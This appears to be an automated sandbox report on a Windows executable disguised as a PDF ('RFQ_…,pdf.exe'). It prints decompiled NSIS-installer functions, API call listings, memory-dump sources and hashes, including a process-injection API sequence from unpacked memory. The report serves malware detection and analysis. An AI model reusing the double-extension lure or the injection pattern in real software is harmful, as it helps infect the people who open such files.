                                                                        					} while (_t20 != _t23);
                                                                        				}
                                                                        				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
                                                                        					_push(0xfffffff5);
                                                                        					E00401428();
                                                                        				} else {
                                                                        					E00401428(0xffffffe6);
                                                                        					E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t25);
                                                                        					SetCurrentDirectoryA(_t25); // executed
                                                                        				}
                                                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t30 - 4));
                                                                        				return 0;
                                                                        			}











                                                                        0x004015d5
                                                                        0x004015dc
                                                                        0x004015e6
                                                                        0x004015e8
                                                                        0x004015ee
                                                                        0x004015f6
                                                                        0x004015fc
                                                                        0x004015fe
                                                                        0x00401601
                                                                        0x00401609
                                                                        0x00401616
                                                                        0x00401623
                                                                        0x00401623
                                                                        0x00401618
                                                                        0x00401619
                                                                        0x00401621
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401621
                                                                        0x00401616
                                                                        0x00401626
                                                                        0x00401629
                                                                        0x0040162b
                                                                        0x0040162c
                                                                        0x004015ee
                                                                        0x00401633
                                                                        0x00401653
                                                                        0x004021e8
                                                                        0x00401635
                                                                        0x00401637
                                                                        0x00401642
                                                                        0x00401648
                                                                        0x00401648
                                                                        0x00402932
                                                                        0x0040293e

                                                                        APIs
                                                                          • Part of subcall function 0040555F: CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ,00000000), ref: 0040556D
                                                                          • Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405572
                                                                          • Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405581
                                                                        • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401601
                                                                        • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 0040160B
                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401619
                                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401648
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 0040163D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                        • API String ID: 3751793516-47812868
                                                                        • Opcode ID: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
                                                                        • Instruction ID: 09f96d0d66b1181939c381e70bae2dcc986a56c468c5fc90a5c01fc4095c1b0e
                                                                        • Opcode Fuzzy Hash: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
                                                                        • Instruction Fuzzy Hash: B2010831908181ABDB212F695D449BF7BB0DA52364B28463BF8D1B22E2C63C4946D63E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004056BF(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                                        				signed int _t11;
                                                                        				int _t14;
                                                                        				signed int _t16;
                                                                        				void* _t19;
                                                                        				CHAR* _t20;
                                                                        
                                                                        				_t20 = _a4;
                                                                        				_t19 = 0x64;
                                                                        				while(1) {
                                                                        					_t19 = _t19 - 1;
                                                                        					_a4 = 0x61736e;
                                                                        					_t11 = GetTickCount();
                                                                        					_t16 = 0x1a;
                                                                        					_a6 = _a6 + _t11 % _t16;
                                                                        					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                                                                        					if(_t14 != 0) {
                                                                        						break;
                                                                        					}
                                                                        					if(_t19 != 0) {
                                                                        						continue;
                                                                        					}
                                                                        					 *_t20 =  *_t20 & 0x00000000;
                                                                        					return _t14;
                                                                        				}
                                                                        				return _t20;
                                                                        			}








                                                                        0x004056c3
                                                                        0x004056c9
                                                                        0x004056ca
                                                                        0x004056ca
                                                                        0x004056cb
                                                                        0x004056d2
                                                                        0x004056dc
                                                                        0x004056e9
                                                                        0x004056ec
                                                                        0x004056f4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004056f8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004056fa
                                                                        0x00000000
                                                                        0x004056fa
                                                                        0x00000000

                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 004056D2
                                                                        • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?,?,C:\Users\user\AppData\Local\Temp\,Error writing temporary file. Make sure your temp folder is valid.,00403148,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ,C:\Users\user\AppData\Local\Temp\), ref: 004056EC
                                                                        Strings
                                                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004056BF
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004056C2
                                                                        • nsa, xrefs: 004056CB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CountFileNameTempTick
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$nsa
                                                                        • API String ID: 1716503409-3657371456
                                                                        • Opcode ID: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                                                                        • Instruction ID: fc1e422234f16816b4991f84e515e98fc6b5cd585f65b5bef5412ac6235d785f
                                                                        • Opcode Fuzzy Hash: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                                                                        • Instruction Fuzzy Hash: F1F0A036748218BAE7104E55EC04B9B7FA9DF91760F14C02BFA089A1C0D6B1A95897A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 026C039B
                                                                        • GetThreadContext.KERNELBASE(?,00010007), ref: 026C03BE
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 026C03E2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656919763.00000000026C0000.00000040.00000001.sdmp, Offset: 026C0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: Process$ContextCreateMemoryReadThread
                                                                        • String ID:
                                                                        • API String ID: 2411489757-0
                                                                        • Opcode ID: 9ab192a0ab5d112922a86b347ba533257f927993b616088db38f28ece6ad4bc7
                                                                        • Instruction ID: 306b9d6b28607cb4c2d3ef3f604753cb8a5dbd636911dd84da8f002afa896eb8
                                                                        • Opcode Fuzzy Hash: 9ab192a0ab5d112922a86b347ba533257f927993b616088db38f28ece6ad4bc7
                                                                        • Instruction Fuzzy Hash: F8322431E40258EEEB24EFA4DC45BBDB7B5EF08704F20409AE619FA2A0D7715A81CF15
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 73%
                                                                        			E0040136D(signed int _a4) {
                                                                        				intOrPtr* _t8;
                                                                        				int _t10;
                                                                        				signed int _t12;
                                                                        				int _t13;
                                                                        				int _t14;
                                                                        				signed int _t21;
                                                                        				int _t24;
                                                                        				signed int _t27;
                                                                        				void* _t28;
                                                                        
                                                                        				_t27 = _a4;
                                                                        				while(_t27 >= 0) {
                                                                        					_t8 = _t27 * 0x1c +  *0x7a2fb0;
                                                                        					__eflags =  *_t8 - 1;
                                                                        					if( *_t8 == 1) {
                                                                        						break;
                                                                        					}
                                                                        					_push(_t8); // executed
                                                                        					_t10 = E00401439(); // executed
                                                                        					__eflags = _t10 - 0x7fffffff;
                                                                        					if(_t10 == 0x7fffffff) {
                                                                        						return 0x7fffffff;
                                                                        					}
                                                                        					__eflags = _t10;
                                                                        					if(__eflags < 0) {
                                                                        						_t10 = E00405936(0x7a4000 - (_t10 + 1 << 0xa), 0x7a4000);
                                                                        						__eflags = _t10;
                                                                        					}
                                                                        					if(__eflags != 0) {
                                                                        						_t12 = _t10 - 1;
                                                                        						_t21 = _t27;
                                                                        						_t27 = _t12;
                                                                        						_t13 = _t12 - _t21;
                                                                        						__eflags = _t13;
                                                                        					} else {
                                                                        						_t13 = 1;
                                                                        						_t27 = _t27 + 1;
                                                                        					}
                                                                        					__eflags =  *(_t28 + 0xc);
                                                                        					if( *(_t28 + 0xc) != 0) {
                                                                        						 *0x7a276c =  *0x7a276c + _t13;
                                                                        						_t14 =  *0x7a2754;
                                                                        						__eflags = _t14;
                                                                        						_t24 = (0 | _t14 == 0x00000000) + _t14;
                                                                        						__eflags = _t24;
                                                                        						SendMessageA( *(_t28 + 0x18), 0x402, MulDiv( *0x7a276c, 0x7530, _t24), 0);
                                                                        					}
                                                                        				}
                                                                        				return 0;
                                                                        			}












                                                                        0x0040136e
                                                                        0x004013fb
                                                                        0x00401382
                                                                        0x00401384
                                                                        0x00401387
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401389
                                                                        0x0040138a
                                                                        0x0040138f
                                                                        0x00401394
                                                                        0x00000000
                                                                        0x00401409
                                                                        0x00401396
                                                                        0x00401398
                                                                        0x004013a6
                                                                        0x004013ab
                                                                        0x004013ab
                                                                        0x004013ad
                                                                        0x004013b5
                                                                        0x004013b6
                                                                        0x004013b8
                                                                        0x004013ba
                                                                        0x004013ba
                                                                        0x004013af
                                                                        0x004013b1
                                                                        0x004013b2
                                                                        0x004013b2
                                                                        0x004013bc
                                                                        0x004013c1
                                                                        0x004013c3
                                                                        0x004013c9
                                                                        0x004013d2
                                                                        0x004013d7
                                                                        0x004013d7
                                                                        0x004013f5
                                                                        0x004013f5
                                                                        0x004013c1
                                                                        0x00000000

                                                                        APIs
                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E5
                                                                        • SendMessageA.USER32(00000402,00000402,00000000), ref: 004013F5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: 4@
                                                                        • API String ID: 3850602802-2385517874
                                                                        • Opcode ID: a45d14e2091946de284817cfc568e15438f589f3a87ce7b3a313abe01bff308b
                                                                        • Instruction ID: c77d45609a211084429c3166b5231f0613d514cab4ec9a945a8c79bb8836a1de
                                                                        • Opcode Fuzzy Hash: a45d14e2091946de284817cfc568e15438f589f3a87ce7b3a313abe01bff308b
                                                                        • Instruction Fuzzy Hash: 9201DE726242109FE7184B39DD09B3B36D8E791314F00823EBA52E66F1E67CDC028B49
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 84%
                                                                        			E00403116(void* __eflags) {
                                                                        				void* _t2;
                                                                        				void* _t5;
                                                                        				CHAR* _t6;
                                                                        
                                                                        				_t6 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
                                                                        				E00405BFB(_t6);
                                                                        				_t2 = E00405538(_t6);
                                                                        				if(_t2 != 0) {
                                                                        					E004054CC(_t6);
                                                                        					CreateDirectoryA(_t6, 0); // executed
                                                                        					_t5 = E004056BF("\"C:\\Users\\jones\\Desktop\\RFQ_AP65425652_032421 isu-isu,pdf.exe\" ", _t6); // executed
                                                                        					return _t5;
                                                                        				} else {
                                                                        					return _t2;
                                                                        				}
                                                                        			}






                                                                        0x00403117
                                                                        0x0040311d
                                                                        0x00403123
                                                                        0x0040312a
                                                                        0x0040312f
                                                                        0x00403137
                                                                        0x00403143
                                                                        0x00403149
                                                                        0x0040312d
                                                                        0x0040312d
                                                                        0x0040312d

                                                                        APIs
                                                                          • Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                                                          • Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                                                          • Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
                                                                          • Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                                                        • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Char$Next$CreateDirectoryPrev
                                                                        • String ID: "C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" $C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 4115351271-1303276226
                                                                        • Opcode ID: 522d963e3f3a4f438d732b49ef20f3582027ff3f63ea88c6e0be8bfaf4fc7fbc
                                                                        • Instruction ID: 6026620382323fd49234fcc764212d1b2eb381da62286567b3783a1d3151fd3a
                                                                        • Opcode Fuzzy Hash: 522d963e3f3a4f438d732b49ef20f3582027ff3f63ea88c6e0be8bfaf4fc7fbc
                                                                        • Instruction Fuzzy Hash: 41D0A92100BD3130C581322A3C06FCF091C8F8732AB00413BF80DB40C24B6C2A828AFE
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 51%
                                                                        			E00401B71(void* __ebx) {
                                                                        				intOrPtr _t8;
                                                                        				void* _t9;
                                                                        				void _t12;
                                                                        				void* _t14;
                                                                        				void* _t22;
                                                                        				void* _t25;
                                                                        				void* _t30;
                                                                        				void* _t33;
                                                                        				void* _t34;
                                                                        				void* _t37;
                                                                        
                                                                        				_t28 = __ebx;
                                                                        				_t8 =  *((intOrPtr*)(_t37 - 0x1c));
                                                                        				_t30 =  *0x40b018; // 0x0
                                                                        				if(_t8 == __ebx) {
                                                                        					if( *((intOrPtr*)(_t37 - 0x20)) == __ebx) {
                                                                        						_t9 = GlobalAlloc(0x40, 0x404); // executed
                                                                        						_t34 = _t9;
                                                                        						_t5 = _t34 + 4; // 0x4
                                                                        						E004059E1(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x24)));
                                                                        						_t12 =  *0x40b018; // 0x0
                                                                        						 *_t34 = _t12;
                                                                        						 *0x40b018 = _t34;
                                                                        					} else {
                                                                        						if(_t30 == __ebx) {
                                                                        							 *((intOrPtr*)(_t37 - 4)) = 1;
                                                                        						} else {
                                                                        							_t3 = _t30 + 4; // 0x4
                                                                        							E004059BF(_t33, _t3);
                                                                        							_push(_t30);
                                                                        							 *0x40b018 =  *_t30;
                                                                        							GlobalFree();
                                                                        						}
                                                                        					}
                                                                        					goto L15;
                                                                        				} else {
                                                                        					while(1) {
                                                                        						_t8 = _t8 - 1;
                                                                        						if(_t30 == _t28) {
                                                                        							break;
                                                                        						}
                                                                        						_t30 =  *_t30;
                                                                        						if(_t8 != _t28) {
                                                                        							continue;
                                                                        						} else {
                                                                        							if(_t30 == _t28) {
                                                                        								break;
                                                                        							} else {
                                                                        								_t32 = _t30 + 4;
                                                                        								E004059BF(0x409c18, _t30 + 4);
                                                                        								_t22 =  *0x40b018; // 0x0
                                                                        								E004059BF(_t32, _t22 + 4);
                                                                        								_t25 =  *0x40b018; // 0x0
                                                                        								_push(0x409c18);
                                                                        								_push(_t25 + 4);
                                                                        								E004059BF();
                                                                        								L15:
                                                                        								 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t37 - 4));
                                                                        								_t14 = 0;
                                                                        							}
                                                                        						}
                                                                        						goto L17;
                                                                        					}
                                                                        					_push(0x200010);
                                                                        					_push(E004059E1(_t28, _t30, _t33, _t28, 0xffffffe8));
                                                                        					E004052BF();
                                                                        					_t14 = 0x7fffffff;
                                                                        				}
                                                                        				L17:
                                                                        				return _t14;
                                                                        			}













                                                                        0x00401b71
                                                                        0x00401b71
                                                                        0x00401b74
                                                                        0x00401b7c
                                                                        0x00401bc5
                                                                        0x00401bf3
                                                                        0x00401bfc
                                                                        0x00401bfe
                                                                        0x00401c02
                                                                        0x00401c07
                                                                        0x00401c0c
                                                                        0x00401c0e
                                                                        0x00401bc7
                                                                        0x00401bc9
                                                                        0x004026da
                                                                        0x00401bcf
                                                                        0x00401bcf
                                                                        0x00401bd4
                                                                        0x00401bdb
                                                                        0x00401bdc
                                                                        0x00401be1
                                                                        0x00401be1
                                                                        0x00401bc9
                                                                        0x00000000
                                                                        0x00401b7e
                                                                        0x00401b7e
                                                                        0x00401b7e
                                                                        0x00401b81
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401b87
                                                                        0x00401b8b
                                                                        0x00000000
                                                                        0x00401b8d
                                                                        0x00401b8f
                                                                        0x00000000
                                                                        0x00401b95
                                                                        0x00401b95
                                                                        0x00401b9f
                                                                        0x00401ba4
                                                                        0x00401bae
                                                                        0x00401bb3
                                                                        0x00401bb8
                                                                        0x00401bbc
                                                                        0x00402855
                                                                        0x0040292f
                                                                        0x00402932
                                                                        0x00402938
                                                                        0x00402938
                                                                        0x00401b8f
                                                                        0x00000000
                                                                        0x00401b8b
                                                                        0x00402280
                                                                        0x0040228d
                                                                        0x0040228e
                                                                        0x00402293
                                                                        0x00402293
                                                                        0x0040293a
                                                                        0x0040293e

                                                                        APIs
                                                                        • GlobalFree.KERNEL32 ref: 00401BE1
                                                                        • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401BF3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Global$AllocFree
                                                                        • String ID: Ivlfdpdlcleoxmzl
                                                                        • API String ID: 3394109436-2859656741
                                                                        • Opcode ID: 60bfd56a69627877b7dcaf3c4329763f6b4d2885f899d2e9ca8849af4094603f
                                                                        • Instruction ID: 32f7db790bc6ccc4888e942dee712ba5a1e8c78a70144b3749ccb6eb80720c04
                                                                        • Opcode Fuzzy Hash: 60bfd56a69627877b7dcaf3c4329763f6b4d2885f899d2e9ca8849af4094603f
                                                                        • Instruction Fuzzy Hash: FB21C3B2A04101DBDB10AF94CE8599B72B9EB44328B20443BF116B33D1D77C99459B9D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 68%
                                                                        			E00405690(CHAR* _a4, long _a8, long _a12) {
                                                                        				signed int _t5;
                                                                        				void* _t6;
                                                                        
                                                                        				_t5 = GetFileAttributesA(_a4); // executed
                                                                        				asm("sbb ecx, ecx");
                                                                        				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                        				return _t6;
                                                                        			}





                                                                        0x00405694
                                                                        0x004056a1
                                                                        0x004056b6
                                                                        0x004056bc

                                                                        APIs
                                                                        • GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
                                                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: File$AttributesCreate
                                                                        • String ID:
                                                                        • API String ID: 415043291-0
                                                                        • Opcode ID: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
                                                                        • Instruction ID: fda52db4846bf436787418750c042d71830ab65c4a714c5a55a7f97c147c79cf
                                                                        • Opcode Fuzzy Hash: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
                                                                        • Instruction Fuzzy Hash: 3BD09E71658301AFEF098F20DE16F2E7AA2EB84B01F10562CFA82940E0D6755C159B16
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004030CD(void* _a4, long _a8) {
                                                                        				int _t6;
                                                                        				long _t10;
                                                                        
                                                                        				_t10 = _a8;
                                                                        				_t6 = ReadFile( *0x409020, _a4, _t10,  &_a8, 0); // executed
                                                                        				if(_t6 == 0 || _a8 != _t10) {
                                                                        					return 0;
                                                                        				} else {
                                                                        					return 1;
                                                                        				}
                                                                        			}





                                                                        0x004030d1
                                                                        0x004030e4
                                                                        0x004030ec
                                                                        0x00000000
                                                                        0x004030f3
                                                                        0x00000000
                                                                        0x004030f5

                                                                        APIs
                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F0D,000000FF,00000004,00000000,00000000,00000000), ref: 004030E4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                                                                        • Instruction ID: 4fd4a8308e5d5898c176f95433ccaa972cd52e025ae54bcd1c8d1e1e5a7d5bbe
                                                                        • Opcode Fuzzy Hash: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                                                                        • Instruction Fuzzy Hash: FEE08C32611219BFCF105E559C01EE73F6CEB043A2F00C032F919E5190D630EA14EBA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004030FF(long _a4) {
                                                                        				long _t2;
                                                                        
                                                                        				_t2 = SetFilePointer( *0x409020, _a4, 0, 0); // executed
                                                                        				return _t2;
                                                                        			}




                                                                        0x0040310d
                                                                        0x00403113

                                                                        APIs
                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2A,?,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 0040310D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
